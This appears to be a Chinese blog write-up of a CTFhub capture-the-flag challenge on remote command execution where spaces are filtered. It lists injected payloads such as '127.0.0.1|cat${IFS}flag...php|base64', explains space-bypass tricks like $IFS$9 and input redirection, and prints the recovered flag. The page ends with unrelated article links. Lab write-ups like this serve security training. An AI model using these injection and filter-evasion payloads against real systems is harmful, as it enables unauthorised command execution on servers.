当前位置: 首页 > article >正文

CTFhub-RCE-过滤空格

article 2025/2/26 23:11:46

1. 查看当前目录:127.0.0.1|ls

2.  查看 flag_890277429145.php

127.0.0.1|cat flag_890277429145.php

根据题目可以知道空格被过滤掉了 

 3.空格可以用以下字符代替:
< 、>、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等

$IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,因此这里加一个{}就固定了变量名。
同理,在后面加个$可以起到截断的作用,使用$9是因为它是当前系统shell进程的第九个参数的持有者,它始终为空字符串。

payload:

127.0.0.1|cat<flag_890277429145.php|base64

127.0.0.1|cat>flag_890277429145.php|base64

127.0.0.1|cat${IFS}flag_890277429145.php|base64

127.0.0.1|cat$IFS$9flag_890277429145.php|base64

base64 解密:

<?php // ctfhub{0f8603081311cfa9c7d1f760}


http://www.kler.cn/a/131715.html

相关文章:

  • 12-1- GAN -简单网络-线性网络
  • 4核8G服务器价格选择轻量还是CVM合适?
  • 使用docker部署ELK日志框架-Elasticsearch
  • JDK,JRE,JVM之间的区别和联系
  • 2023.11.17 -hivesql调优,数据压缩,数据存储
  • 腾讯云4核8G服务器配置价格表,轻量和CVM标准型S5实例
  • mysqldump常用操作示例/命令
  • Go fsnotify简介
  • 【EI会议征稿】第七届大数据与应用统计国际学术研讨会(ISBDAS 2024)
  • vue实现调用手机拍照、录像功能
  • Android13 adb 无法连接?
  • 【UI】饿了么 el-upload如何上传到不同的路径, 根据不同情况上传指不同的接口,不同的路径
  • 『GitHub项目圈选02』一款可实现视频自动翻译配音为其他语言的开源项目
  • Java中for、foreach、stream区别和性能比较
  • 图论15-有向图-环检测+度数+欧拉回路
  • Linux shell 中变量 $#,$@,$0,$1,$2,$*,$$,$? 的含义
  • 吴恩达《机器学习》8-7:多元分类
  • 使用 com.jacob.activeX 库实现 Word 到 PDF
  • 交换机聚合配置 (H3C)
  • Ubuntu/Debian Hat 系 Linux 使用